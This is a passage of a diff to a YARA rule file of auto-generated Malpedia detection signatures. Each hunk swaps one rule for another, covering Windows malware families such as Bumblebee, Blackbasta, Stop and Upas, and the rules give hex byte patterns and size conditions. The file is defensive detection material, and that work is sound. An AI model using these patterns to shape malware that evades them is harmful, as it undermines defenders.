+		$sequence_7 = { 6878e98cff ffd6 68???????? ffd6 68???????? }
+		$sequence_8 = { 8b2410 895e20 897e24 33c0 5f 5e }
+		$sequence_9 = { 7562 8b4c2418 8b441e09 01d2 f7f1 8bd8 68442410f7 }
 
 	condition:
-		7 of them and filesize < 1027072
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Stealhook_Auto : FILE
+rule MALPEDIA_Win_Upas_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "519c47bf-6262-59f6-ba96-b268e3554c31"
+		id = "ff6fa077-a4cc-5245-b43e-d462dbb909cf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealhook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealhook_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.upas_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "34472d9d45445d7f0701c527e6f0fa4bcdf4882e35f9c62ec30365acd8243253"
+		logic_hash = "2dbc02d44bc44069a95867e1264648df697162b7220114880dd132223d4a0c26"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111801,32 +111880,32 @@ rule MALPEDIA_Win_Stealhook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4983c002 4863c8 493bc9 72d8 488d3599d60700 418bc5 4983fa07 }
-		$sequence_1 = { 488bc6 4983fa07 490f47c3 6644390401 7410 ffc2 4883c102 }
-		$sequence_2 = { 4c8b642440 488b75cf 498b7d28 4885ff 7e0a 483bfe 7605 }
-		$sequence_3 = { f30f7f4590 c6458000 0f57c0 0f11442420 4889742430 4889742438 4c8d7dc0 }
-		$sequence_4 = { 488b442478 49894550 49894558 49899d80000000 488b05???????? 49894574 49896d68 }
-		$sequence_5 = { 84c0 0f84e3020000 488d4d18 48837d300f 480f474d18 80397f 0f83cc020000 }
-		$sequence_6 = { 488b8c2428010000 e8???????? 488b8c2428010000 e8???????? 488b942428030000 4883fa07 763b }
-		$sequence_7 = { 488bd5 488bc7 48d1ea 482bc2 483be8 77e3 }
-		$sequence_8 = { e8???????? 0f1038 0f117dc0 0f107010 0f1175d0 }
-		$sequence_9 = { 450fb706 4885db 744c 488b4340 48833800 741f }
+		$sequence_0 = { 68???????? ff15???????? 8bf8 85ff 7503 40 }
+		$sequence_1 = { 8d4304 3bc7 0f8496000000 8b450c 397804 0f848a000000 68???????? }
+		$sequence_2 = { 85c0 7441 397d18 740f 53 57 ffd6 }
+		$sequence_3 = { 0f85fd000000 8d45fc 50 57 57 6a03 }
+		$sequence_4 = { 68???????? ff7508 ffd7 ff7508 8b1d???????? ffd3 8d45fc }
+		$sequence_5 = { 8b4508 8b403c 5d c3 8b4508 8b4008 }
+		$sequence_6 = { 7507 0bcf 83fe03 7317 83fa04 7512 }
+		$sequence_7 = { 55 8bec 8b450c 48 7413 48 7410 }
+		$sequence_8 = { ff75fc 83e905 ff75ec c600e9 }
+		$sequence_9 = { 897dfc e8???????? 59 8bc8 8945ec }
 
 	condition:
-		7 of them and filesize < 1129472
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Bumblebee_Auto : FILE
+rule MALPEDIA_Win_Biscuit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb13bacf-dfd1-5f67-a954-b108745cbd18"
+		id = "66751c6c-b859-5182-9d1d-e9646223d6c4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bumblebee_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.biscuit_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "1740917da778479acf746acdc75f2beb6821c321be8f136bbd653a625bc1c0f8"
+		logic_hash = "84aba44ada1e956d4a74e202350a88ae7df3ab1612a23de6af2ad0ed5a1e2805"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111840,32 +111919,32 @@ rule MALPEDIA_Win_Bumblebee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f849b010000 be80030000 488d4c2470 448bc6 }
-		$sequence_1 = { 488b4108 488bd9 4183c9ff 4889442428 }
-		$sequence_2 = { ff15???????? 90 33c0 488b5c2448 }
-		$sequence_3 = { 4881ec20040000 488b05???????? 4833c4 48898518030000 4c8bf1 }
-		$sequence_4 = { b8c0000000 4803fe ba64860000 66395304 8d4810 0f44c1 }
-		$sequence_5 = { 498bce ffd0 85c0 0f8895000000 8b7b28 b8c0000000 4803fe }
-		$sequence_6 = { 488bd8 c744243802000000 488d442450 4889442430 4c8bc6 488d842498000000 488bd5 }
-		$sequence_7 = { 4885d2 7411 4883c208 4883c108 }
-		$sequence_8 = { 48833b00 480f453b 488bcb e8???????? 488bc7 488b8d18030000 4833cc }
-		$sequence_9 = { 33db 4d8bf0 4c8bea 48895d48 8bf1 48895dc8 33d2 }
+		$sequence_0 = { 89542420 8b542410 6a00 51 6a00 52 }
+		$sequence_1 = { 50 ff15???????? 8b35???????? 8d4c240c 51 68???????? 6a00 }
+		$sequence_2 = { ffd6 8b4304 8d55ec 6a04 52 6a02 50 }
+		$sequence_3 = { 2b9584feffff 899598feffff 8b858cfeffff 3b8598feffff 0f87d4000000 8b8d8cfeffff }
+		$sequence_4 = { 8b8d1cb7ffff bf???????? 8bb524b7ffff 33d2 899544b6ffff }
+		$sequence_5 = { 83fefd 897508 7605 e8???????? 8b4b04 33d2 3bca }
+		$sequence_6 = { ff15???????? 6a64 ff15???????? e9???????? 5f 5e }
+		$sequence_7 = { 85f6 7533 fec8 56 8841ff 8bcb e8???????? }
+		$sequence_8 = { 8b9530daffff 83c9ff 33c0 f2ae f7d1 2bf9 8bf7 }
+		$sequence_9 = { a1???????? 50 6a00 8b8d30b8ffff 51 }
 
 	condition:
-		7 of them and filesize < 4825088
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Glooxmail_Auto : FILE
+rule MALPEDIA_Win_Pgift_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8b40bc0-2701-5e85-b527-dfec9c8227da"
+		id = "5134e180-c701-504d-b27b-1f2a37782304"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glooxmail_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pgift_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "0702baea6e45ee40dbbd470cae1ae641eba3358089995e7fe66a20e43c2df933"
+		logic_hash = "86543d2a9c2965bb35bf9078bd182bce16bae717918e12d47f187ce1755d9b8f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111879,32 +111958,32 @@ rule MALPEDIA_Win_Glooxmail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4dd8 e8???????? 8d45a0 50 8d45d8 c745fc17000000 814d5c00020000 }
-		$sequence_1 = { 3bc3 744a 68???????? 8d8c24f0010000 e8???????? 8b442418 c684246004000020 }
-		$sequence_2 = { e8???????? c68424a000000003 68???????? 8d4c2428 895c2418 e8???????? 57 }
-		$sequence_3 = { 5e c20400 6a3c b8???????? e8???????? 8b7508 8d4604 }
-		$sequence_4 = { e8???????? 8b874c010000 83c40c 8d4dd4 3945e8 760a }
-		$sequence_5 = { 8b4604 80b89417450000 7f15 56 e8???????? }
-		$sequence_6 = { 7405 e8???????? 3974241c 746a 807f7c00 742c 83ec1c }
-		$sequence_7 = { bf???????? 57 8d8d24ffffff e8???????? 68???????? 8d8d5cffffff c745fc0b000000 }
-		$sequence_8 = { 8bc7 e8???????? 59 84c0 7414 8b4e04 85c9 }
-		$sequence_9 = { e8???????? 807def00 740f c783a000000002000000 e9???????? 68???????? 8d4da4 }
+		$sequence_0 = { c645fc03 e8???????? ff7510 8d4de8 }
+		$sequence_1 = { e8???????? 8d7e01 57 ebac }
+		$sequence_2 = { 53 6a11 ff15???????? 8bd8 8d45ec }
+		$sequence_3 = { 53 6a01 6800000040 ff75ec ff15???????? 8bd8 }
+		$sequence_4 = { 7408 ff4510 83c710 eb99 8b4e14 }
+		$sequence_5 = { 89450c 8d45e4 53 50 8d4594 50 }
+		$sequence_6 = { 50 8d4de4 e8???????? 33db 8d8de4feffff 895dfc 895dec }
+		$sequence_7 = { 8d4de8 c645fc01 e8???????? 83f8ff 750f 6a2f 8d4de8 }
+		$sequence_8 = { e9???????? 8b4d08 8bc3 2bc1 c1f802 3bc7 7369 }
+		$sequence_9 = { e8???????? ff75e8 ff15???????? eb53 8b45ec 3958f8 742f }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Cradlecore_Auto : FILE
+rule MALPEDIA_Win_Romeos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c02dd3cc-a2fa-5db2-b15e-6536b0232a3b"
+		id = "bb3171da-1b84-5cda-93f9-c750b4ebf760"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cradlecore_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.romeos_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "e4b2ddac2d160e24e50f2cbbb671c4c77a767dbac5be4d1bf9ebefaf8002be13"
+		logic_hash = "bf8e366219ae553a8681194274b3fe54bbd7c5cf107fd9635cc89862e4d3fd87"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111918,32 +111997,38 @@ rule MALPEDIA_Win_Cradlecore_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7402 2bf8 6aff 6a00 8d45d8 8bce }
-		$sequence_1 = { 8b048db8734000 ffe0 f7c703000000 7515 c1e902 83e203 }
-		$sequence_2 = { 6a00 ff7508 8b16 ff5238 8ac8 }
-		$sequence_3 = { 33f6 46 837de810 8bc1 7303 8d45d4 03c6 }
-		$sequence_4 = { 837f1410 894dd8 7204 8b07 eb02 8bc7 803c103d }
-		$sequence_5 = { 0f8f4dffffff 7c08 85f6 0f8543ffffff 8b4c240c 8b542410 5f }
-		$sequence_6 = { ff15???????? 85c0 7514 6a07 8d45d0 50 6a01 }
-		$sequence_7 = { 57 ffd6 6a04 8d4508 c7450803000000 50 }
-		$sequence_8 = { e8???????? 395f40 7527 ff7750 885c2413 8d442413 33db }
-		$sequence_9 = { 894108 8d4d90 c645fc05 e8???????? 6a00 ff7508 8d8d24feffff }
+		$sequence_0 = { e8???????? 85c0 0f85ef000000 85db 751d 807c244802 0f85e0000000 }
+		$sequence_1 = { 85c0 0f850d010000 33db 6a16 8d4c244c 6800200000 51 }
+		$sequence_2 = { 6a16 8d4c2420 55 51 57 8bce e8???????? }
+		$sequence_3 = { 33c0 8d7c2449 c644244800 6a16 }
+		$sequence_4 = { 3bdd 7cf2 8b542414 6a16 8d44244c }
+		$sequence_5 = { 8d542414 8d442448 52 50 e8???????? }
+		$sequence_6 = { 50 57 e8???????? 85c0 0f850d010000 }
+		$sequence_7 = { c644241701 50 bd30000000 e8???????? 8bbc2454200000 83c404 }
+		$sequence_8 = { c644245c2e c644245d64 885c245e 885c245f }
+		$sequence_9 = { 89442418 e8???????? 6802020000 55 }
+		$sequence_10 = { 89442410 8b442414 8d542468 52 50 ff15???????? }
+		$sequence_11 = { c644247475 c644247574 884c2476 88442477 }
+		$sequence_12 = { 7508 ff15???????? 8bf0 3b7c2410 7408 }
+		$sequence_13 = { ffd7 8bf0 85f6 7447 8b3d???????? 6820590110 }
+		$sequence_14 = { 8d94241c010000 68ff000000 8d442414 52 }
+		$sequence_15 = { 6a01 51 c744242c0c000000 89742430 895c2434 }
 
 	condition:
-		7 of them and filesize < 450560
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Underminer_Ek_Auto : FILE
+rule MALPEDIA_Win_Bart_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f11b78f3-676c-503e-af81-133bd7b27942"
+		id = "47f2dba4-1ef6-5808-90b4-0ef4438e03a3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.underminer_ek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.underminer_ek_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bart_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "2f91a4d4f297062b3d3b07b58a9c1bfef73e9c0060b6e1680dc04cf736854cd4"
+		logic_hash = "b12024871014a9e86ab993e82383bdd8cbf27e2df488611e968a0202264b8904"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -111957,38 +112042,32 @@ rule MALPEDIA_Win_Underminer_Ek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b9???????? c7431000000000 8d5101 c743140f000000 c60300 0f1f8000000000 }
-		$sequence_1 = { 8d0c76 8b048f 89430c 8b448f08 33db 33c9 33d2 }
-		$sequence_2 = { 8b0485582c4300 8945d0 81f9e9fd0000 0f852d010000 8b55b4 83c02e }
-		$sequence_3 = { 7618 8b4dec 50 8b4704 0301 50 8b47fc }
-		$sequence_4 = { eb1b 8b0c95582c4300 8a443928 a840 7508 0c02 88443928 }
-		$sequence_5 = { 8945fc 8b7dfc 8b470c 3bc3 7437 }
-		$sequence_6 = { e8???????? 8d4dd0 e8???????? 8bf4 8bf8 83ec18 }
-		$sequence_7 = { c3 8b442404 8325????????00 a3???????? 8b442408 a3???????? }
-		$sequence_8 = { 25ffff0000 eb07 03c7 6a00 83c002 }
-		$sequence_9 = { 7408 3b5d14 7351 8d0c13 51 50 56 }
-		$sequence_10 = { 83f81f 0f8767110000 52 51 }
-		$sequence_11 = { 7474 807dfd03 7540 84d2 740c b9da51fa7e }
-		$sequence_12 = { 3cb8 3cc2 3cd3 3cd8 3ce2 3cf3 }
-		$sequence_13 = { e8???????? 3bde 7412 0fb603 8bcf }
-		$sequence_14 = { 8d7dc2 66895dc0 ff7508 895dec ab ff760c }
-		$sequence_15 = { 0f42c1 a3???????? 8b8584feffff 83f806 7545 }
+		$sequence_0 = { 8d45ff 6a01 50 53 ffd7 8a4632 8845ff }
+		$sequence_1 = { 5f 8be5 5d c3 b8???????? e8???????? 83ec18 }
+		$sequence_2 = { 889d78ffffff 57 8b7d10 84db 0f8ed3020000 0fb6d3 }
+		$sequence_3 = { c3 55 8bec 51 53 8b5d08 8d45ff }
+		$sequence_4 = { 89848e70af0400 4b 75a8 8b45f8 eb56 }
+		$sequence_5 = { 56 e8???????? 8b9d68ffffff 8d45bc 50 8b87b0000000 53 }
+		$sequence_6 = { 8b45e0 59 3945d4 7596 3bde 0f841c020000 }
+		$sequence_7 = { 8d4517 885d17 50 56 ffd7 8b5df4 8d4517 }
+		$sequence_8 = { 56 53 50 6a00 57 }
+		$sequence_9 = { 83f819 0f84ae000000 83ff23 0f84a5000000 83fe23 0f849c000000 83f823 }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Broler_Auto : FILE
+rule MALPEDIA_Win_Chainshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e5ddbcf2-267f-50c4-9a07-ee97c0a66c40"
+		id = "e1db7f53-0270-5824-82d9-8aed908ee2be"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.broler_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chainshot_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "a1c6e2e8a7e6cd7262212833aaeef2ea07ebc3af38a6241bbd7582277c8df1b7"
+		logic_hash = "8440e51f4c64f9f335a379594cb3f694f5050a99bd0f6190db9cf62fbca5d726"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112002,32 +112081,32 @@ rule MALPEDIA_Win_Broler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 50 ff15???????? 3bc3 7408 8d4dc8 51 }
-		$sequence_1 = { 885dd4 720c 8b55b8 52 e8???????? 83c404 837d1c10 }
-		$sequence_2 = { 84c9 75f9 2bc2 8bf8 8bc3 8d75d4 }
-		$sequence_3 = { 894508 c1f818 8bdf c1fb18 81e3ff000000 3283085b4100 8b5d0c }
-		$sequence_4 = { 8bf8 ff15???????? 85ff 7508 57 53 ff15???????? }
-		$sequence_5 = { 8bcc 895910 c741140f000000 8d5508 89a51cdffcff }
-		$sequence_6 = { 50 83c8ff 33db e8???????? 8d8d8cfeffff e8???????? 83c440 }
-		$sequence_7 = { 85c0 0f8489000000 33d2 f7b6cc030000 85d2 0f8579000000 }
-		$sequence_8 = { c60100 e8???????? 8dbd8cfeffff e8???????? 83c41c 8bf8 8db554feffff }
-		$sequence_9 = { 03d8 3bd9 7624 83fa10 7204 8b06 }
+		$sequence_0 = { e8???????? 8d5e30 8bcb e8???????? }
+		$sequence_1 = { 7408 ffd0 8905???????? b90c000080 894c2420 }
+		$sequence_2 = { 33d2 85c0 750a b901090080 e9???????? }
+		$sequence_3 = { 894718 0f84740b0000 83f803 0f84bb0e0000 83f801 }
+		$sequence_4 = { 750c 807b0208 7506 807b030d 7449 }
+		$sequence_5 = { b9020e0080 e8???????? b916000000 e8???????? }
+		$sequence_6 = { ffd0 8905???????? bb52000080 eb03 }
+		$sequence_7 = { 33d2 b907080080 e8???????? 32db eb24 33d2 }
+		$sequence_8 = { 8b4d50 85c9 7507 b9070e0080 eb17 }
+		$sequence_9 = { 75d0 85ff 745d 83ff04 }
 
 	condition:
-		7 of them and filesize < 275456
+		7 of them and filesize < 802816
 }
-rule MALPEDIA_Win_Sepsys_Auto : FILE
+rule MALPEDIA_Win_Boaxxe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae60c103-173f-5306-92ac-d702be74a065"
+		id = "1250eef8-010c-5e96-be9a-abfd5ef5d010"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sepsys_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boaxxe_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "652d59df346d9da22c7542823cefcfc7111985f5ad38199ac4913217f1dfac22"
+		logic_hash = "8a3a4e3c549e35ded84e2465f19cea84a5ad121ff4106ae44ae1865048bfef1a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112041,32 +112120,32 @@ rule MALPEDIA_Win_Sepsys_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c685fb00000000 8a4517 2401 88c1 e8???????? 884516 eb00 }
-		$sequence_1 = { e8???????? eb00 488b4db0 c645f700 488b45c8 488945e0 0f1045b8 }
-		$sequence_2 = { e9???????? 4883bd9801000000 7714 eb09 c685df01000001 eb29 c685df01000000 }
-		$sequence_3 = { e8???????? 488b442428 488b4820 48894c2478 488b4828 48898c2480000000 488b4830 }
-		$sequence_4 = { eb00 eb00 eb00 31c0 89c1 488b55f0 4881ea02000000 }
-		$sequence_5 = { 817c243448270000 7507 c644243001 eb05 c644243000 48837c245800 740b }
-		$sequence_6 = { 83c804 89442420 8b442420 0fbaf008 89442420 e9???????? 8b442420 }
-		$sequence_7 = { e8???????? 488d4518 488b4df8 48894de8 4889c1 488b55e8 4c8b45f0 }
-		$sequence_8 = { ebe9 488b45e0 4883c460 5d c3 f645f601 74f0 }
-		$sequence_9 = { c685b600000000 c685b400000000 e9???????? c685b400000000 488b4d28 488b5530 e8???????? }
+		$sequence_0 = { 8d45ec e8???????? 66837dee08 0f8290000000 33d2 55 68???????? }
+		$sequence_1 = { 7d02 8bc3 8bc8 03c9 8b1424 8b06 e8???????? }
+		$sequence_2 = { 833c2400 750e b001 e8???????? eb05 33c0 890424 }
+		$sequence_3 = { e8???????? ff75e8 8bc7 ba03000000 e8???????? 43 83fb0a }
+		$sequence_4 = { 8b45f4 8b55e8 e8???????? c645f301 eb0f 43 4f }
+		$sequence_5 = { 8d4ddc ba12000000 e8???????? 8d45dc 50 e8???????? e8???????? }
+		$sequence_6 = { ba???????? 8b45fc e8???????? 8b45f4 8bd3 e8???????? 8b03 }
+		$sequence_7 = { 8b4028 e8???????? 33c0 89431c c7432001000000 c7435404000000 eb3c }
+		$sequence_8 = { ff75e4 ff75e8 683850bc6d e8???????? 83c410 8b45f8 83ec08 }
+		$sequence_9 = { c745fc20000000 8d45a0 8b55f0 e8???????? 8b45a0 33c9 8b55f4 }
 
 	condition:
-		7 of them and filesize < 4538368
+		7 of them and filesize < 1146880
 }
-rule MALPEDIA_Win_Mutabaha_Auto : FILE
+rule MALPEDIA_Win_Lightbunny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0b7c3233-e337-53ad-9db2-68c9d4c66563"
+		id = "86c71225-3e49-57f7-8a14-1d446e18ff78"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mutabaha_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightbunny_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "927984049f5ae8f206bee3f98c76bb65fa49de69b36e329af5d25dd2060b803c"
+		logic_hash = "33cbdcbf0c5d4d510f8f905bf01b71c8a0fd5566bc7f248daf644c66992c59c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112080,32 +112159,32 @@ rule MALPEDIA_Win_Mutabaha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? 8d8d9cfdffff c645fc01 e8???????? 68???????? 8d8db4fdffff c645fc02 }
-		$sequence_1 = { 8d45b8 50 6a00 6a16 ff15???????? 8bbd7cfdffff 8d45b8 }
-		$sequence_2 = { 83c40c 8d85f8f3ffff 6800040000 6a00 50 e8???????? 83c40c }
-		$sequence_3 = { 68???????? 8bd0 c645fc29 8d8dd0feffff e8???????? 83c404 6aff }
-		$sequence_4 = { 89460c eb6a 8d0492 c1e003 50 8b450c 50 }
-		$sequence_5 = { 50 8d4dd4 0f43ce 53 e8???????? 8bb568ffffff }
-		$sequence_6 = { 7202 8b36 56 8d85e8fdffff 68???????? 50 }
-		$sequence_7 = { 2bca d1f9 51 57 8d8dc4fbffff e8???????? 6a10 }
-		$sequence_8 = { 6689859cfeffff 8b8598feffff c785acfeffff00000000 83f808 7213 40 8d8d84feffff }
-		$sequence_9 = { 762a 33c0 8a4e04 8bdf 895df0 84c9 745a }
+		$sequence_0 = { 57 8bf9 83f808 7278 807c06ff00 }
+		$sequence_1 = { 0f57c0 b802000000 0f1145ec 668945ec ff15???????? 8945f0 0fb7460c }
+		$sequence_2 = { 0f85c5000000 8b85fffeffff 57 8d7b08 3c01 7538 }
+		$sequence_3 = { 6a04 58 6bc000 c780cca7410002000000 }
+		$sequence_4 = { 56 8945f0 be10000000 40 8955e4 8b5508 894df4 }
+		$sequence_5 = { c705????????00000000 e8???????? 83c40c 6a06 6a01 6a02 ff15???????? }
+		$sequence_6 = { 69f224100000 81c6???????? 7410 c7460404000000 ff15???????? }
+		$sequence_7 = { 83c40c 81ff00010000 7367 8d85fcfdffff 889c3dfcfdffff 50 }
+		$sequence_8 = { 33c0 8d3c9d58ab4100 f00fb10f 8bc8 85c9 740b }
+		$sequence_9 = { 8bf0 b902000000 83feff 0f85f7feffff 68???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 1220608
+		7 of them and filesize < 2376704
 }
-rule MALPEDIA_Win_Stop_Auto : FILE
+rule MALPEDIA_Win_Blackbasta_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de89cbb5-1ad4-59ee-8eda-db1d3b1226e9"
+		id = "056c2725-7fc6-5492-9e95-8858f5743ba4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stop_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackbasta_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "1680007e54c6e417cda892af6931e2e17f934d49d2fb7326d537897be6e026a2"
+		logic_hash = "5917351a58e2c45d71cb940556c45aaf794c00ea6a4cfbb1a7458b7fa470cb76"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112119,32 +112198,32 @@ rule MALPEDIA_Win_Stop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 8b4b04 b8abaaaa2a 2b0b f7e9 8bcf }
-		$sequence_1 = { ff15???????? 8b35???????? 8b3d???????? 6a01 6a00 6a00 6a00 }
-		$sequence_2 = { ffd7 6a01 6a00 6a00 6a00 8d45e0 50 }
-		$sequence_3 = { 50 ffd6 85c0 75e8 6a0a ff7304 ff15???????? }
-		$sequence_4 = { 83c404 8b4b04 b8abaaaa2a 2b0b }
-		$sequence_5 = { ffd6 85c0 75e2 5f }
-		$sequence_6 = { 83c102 eb84 6a0c 68???????? e8???????? 8b7d08 33c9 }
-		$sequence_7 = { 6a00 6a00 8d45e0 50 ffd6 85c0 741e }
-		$sequence_8 = { 57 6a00 8bd9 6a00 6a12 ff33 ff15???????? }
-		$sequence_9 = { 75e8 6a0a ff7304 ff15???????? 3d02010000 74c4 }
+		$sequence_0 = { 8b3403 85f6 0f856f010000 eb02 33f6 80791400 7410 }
+		$sequence_1 = { e9???????? c7456001000000 83fe01 0f86ff000000 90 8d4548 50 }
+		$sequence_2 = { 8b450c 83c01c 50 8d4920 e8???????? 8b450c 8b4df0 }
+		$sequence_3 = { 56 8d581c 8d6804 7442 6a00 8bcb }
+		$sequence_4 = { 53 56 57 8bf9 8b37 85f6 747a }
+		$sequence_5 = { 56 51 6a01 8bcb ff5034 8b03 }
+		$sequence_6 = { c7471400000000 e8???????? c7461000000000 83c40c c746140f000000 c60600 be08000000 }
+		$sequence_7 = { 8d957cffffff 52 8d95d4feffff 52 ff5024 8b8dd0feffff 8d957cffffff }
+		$sequence_8 = { c7855cfeffff980a0a10 e8???????? 57 8d8d78feffff c745fc09000000 }
+		$sequence_9 = { 8975f0 c706???????? c74604???????? c74608???????? c7462060ed0910 c745fcffffffff e8???????? }
 
 	condition:
-		7 of them and filesize < 6029312
+		7 of them and filesize < 1758208
 }
-rule MALPEDIA_Win_Kagent_Auto : FILE
